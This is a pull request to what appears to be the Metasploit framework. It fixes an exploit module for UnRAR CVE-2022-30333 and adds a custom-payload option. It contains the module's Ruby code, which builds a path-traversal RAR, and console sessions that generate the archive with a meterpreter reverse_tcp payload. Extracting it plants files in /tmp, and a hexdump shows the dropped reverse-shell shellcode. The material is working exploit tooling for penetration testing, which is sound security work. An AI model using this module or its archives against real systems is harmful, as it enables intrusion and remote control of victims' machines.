### PR TITLE
Fix a payload bug in unrar_cve_2022_30333

### DIFF
--- a/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md
+++ b/documentation/modules/exploit/linux/fileformat/unrar_cve_2022_30333.md
@@ -55,8 +55,87 @@ The filename to generate, typically it's `payload.rar` and that works fine.
 
 The path, including traversal characters (`../`) and the filename. The slashes' direction doesn't matter, that gets fixed in the module.
 
+### `SYMLINK_FILENAME`
+
+If set, use a specific filename for the symlink inside the RAR file - default (random) is almost always best.
+
+### `CUSTOM_PAYLOAD`
+
+If set, instead of encoding the configured payload, encode data from the given filename.
+
 ## Scenarios
 
 This is a pretty generic exploit that can be used against any software with a bad version of UnRAR.
 
 We also built a specific exploit for Zimbra - `exploit/linux/http/zimbra_unrar_cve_2022_30333`.
+
+### Built-in payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.bin
+TARGET_PATH => ../../../../../../../../tmp/evil.bin
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
+
+[*] Target filename: ../../../../../../../../tmp/evil.bin
+[*] Encoding configured payload
+[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  xkmcxqotn                                                 OK 
+Extracting  xkmcxqotn                                                 OK 
+All OK
+ron@fedora ~/.msf4/local $ file /tmp/evil.bin
+/tmp/evil.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, no section header
+```
+
+### Custom payload
+
+```
+msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333
+[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146
+LHOST => 10.0.0.146
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil.sh
+TARGET_PATH => ../../../../../../../../tmp/evil.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+[*] exec: echo -ne "#!/bin/bash\nwhoami\n" > /tmp/test.sh
+msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set CUSTOM_PAYLOAD /tmp/test.sh
+CUSTOM_PAYLOAD => /tmp/test.sh
+```
+
+Then:
+
+```
+ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar
+
+UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal
+
+
+Extracting from ./payload.rar
+
+Extracting  jwbhkf                                                    OK 
+Extracting  jwbhkf                                                    OK 
+All OK
+ron@fedora ~/.msf4/local $ bash /tmp/evil.sh
+ron
+/tmp/evil.sh: line 4: $'\177P\336': command not found
+[...]
+```
+
+(The errors at the bottom are because we append random junk to the end for padding)
+
+

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -70,6 +70,10 @@ class MetasploitModule < Msf::Exploit::Remote
     if datastore['CUSTOM_PAYLOAD'] && !datastore['CUSTOM_PAYLOAD'].empty?
       print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")
       payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])
+
+      # Append a newline + NUL byte, since random data will be appended and we
+      # don't want to break shellscripts
+      payload_data.concat("\n\0")
     else
       print_status('Encoding configured payload')
       payload_data = generate_payload_exe

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -67,7 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status("Target filename: #{datastore['TARGET_PATH']}")
 
-    if datastore['CUSTOM_PAYLOAD'] && !datastore['CUSTOM_PAYLOAD'].empty?
+    if datastore['CUSTOM_PAYLOAD'].present?
       print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")
       payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])
 

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -57,8 +57,9 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('FILENAME', [ false, 'The file name.', 'payload.rar']),
+        OptString.new('CUSTOM_PAYLOAD', [ false, 'A custom payload to encode' ]),
         OptString.new('TARGET_PATH', [ true, 'The location the payload should extract to (can, and should, contain path traversal characters - "../../" - as well as a filename).']),
-        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)']),
+        OptString.new('SYMLINK_FILENAME', [ false, 'The name of the symlink file to use (must be 12 characters or less; default: random)'])
       ]
     )
   end
@@ -66,8 +67,16 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     print_status("Target filename: #{datastore['TARGET_PATH']}")
 
+    if datastore['CUSTOM_PAYLOAD'] && !datastore['CUSTOM_PAYLOAD'].empty?
+      print_status("Encoding custom payload file: #{datastore['CUSTOM_PAYLOAD']}")
+      payload_data = File.binread(datastore['CUSTOM_PAYLOAD'])
+    else
+      print_status('Encoding configured payload')
+      payload_data = generate_payload_exe
+    end
+
     begin
-      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload.encoded)
+      rar = encode_as_traversal_rar(datastore['SYMLINK_FILENAME'] || Rex::Text.rand_text_alpha_lower(4..12), datastore['TARGET_PATH'], payload_data)
     rescue StandardError => e
       fail_with(Failure::BadConfig, "Failed to encode RAR file: #{e}")
     end

--- a/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
+++ b/modules/exploits/linux/fileformat/unrar_cve_2022_30333.rb
@@ -40,10 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'Platform' => 'linux',
         'Arch' => [ARCH_X86, ARCH_X64],
-        'Payload' => {
-          # The RAR file has 4096 bytes of space
-          'Space' => 4096
-        },
         'Targets' => [
           [ 'Generic RAR file', {} ]
         ],


### PR DESCRIPTION
I'm not sure why, but setting `Space` messes things up. This fixes https://github.com/rapid7/metasploit-framework/issues/16924

## Verification

Run the exploit:

```
msf6 > use exploit/linux/fileformat/unrar_cve_2022_30333                                                                            
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set LHOST 10.0.0.146                                                          
LHOST => 10.0.0.146
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > set TARGET_PATH ../../../../../../../../tmp/evil                              
TARGET_PATH => ../../../../../../../../tmp/evil
msf6 exploit(linux/fileformat/unrar_cve_2022_30333) > exploit
                                                                 
[*] Target filename: ../../../../../../../../tmp/evil
[+] payload.rar stored at /home/ron/.msf4/local/payload.rar
```

Unrar the `payload.rar` file with Unrar 6.11 or earlier:

```
ron@fedora ~/.msf4/local $ ~/tools/unrar/unrar x -o+ ./payload.rar

UNRAR 6.11 freeware      Copyright (c) 1993-2022 Alexander Roshal


Extracting from ./payload.rar

Extracting  ylhfjkhlfu                                                OK 
Extracting  ylhfjkhlfu                                                OK 
All OK
```

The start of the file should be the payload (followed by random junk):

```
ron@fedora ~/.msf4/local $ hexdump -C /tmp/evil | head
00000000  48 31 ff 6a 09 58 99 b6  10 48 89 d6 4d 31 c9 6a  |H1.j.X...H..M1.j|
00000010  22 41 5a b2 07 0f 05 48  85 c0 78 51 6a 0a 41 59  |"AZ....H..xQj.AY|
00000020  50 6a 29 58 99 6a 02 5f  6a 01 5e 0f 05 48 85 c0  |Pj)X.j._j.^..H..|
00000030  78 3b 48 97 48 b9 02 00  11 5c 0a 00 00 92 51 48  |x;H.H....\....QH|
00000040  89 e6 6a 10 5a 6a 2a 58  0f 05 59 48 85 c0 79 25  |..j.Zj*X..YH..y%|
00000050  49 ff c9 74 18 57 6a 23  58 6a 00 6a 05 48 89 e7  |I..t.Wj#Xj.j.H..|
00000060  48 31 f6 0f 05 59 59 5f  48 85 c0 79 c7 6a 3c 58  |H1...YY_H..y.j<X|
00000070  6a 01 5f 0f 05 5e 6a 7e  5a 0f 05 48 85 c0 78 ed  |j._..^j~Z..H..x.|
00000080  ff e6 6c d3 58 9b a5 5c  96 55 58 92 b9 d1 d8 f7  |..l.X..\.UX.....|
```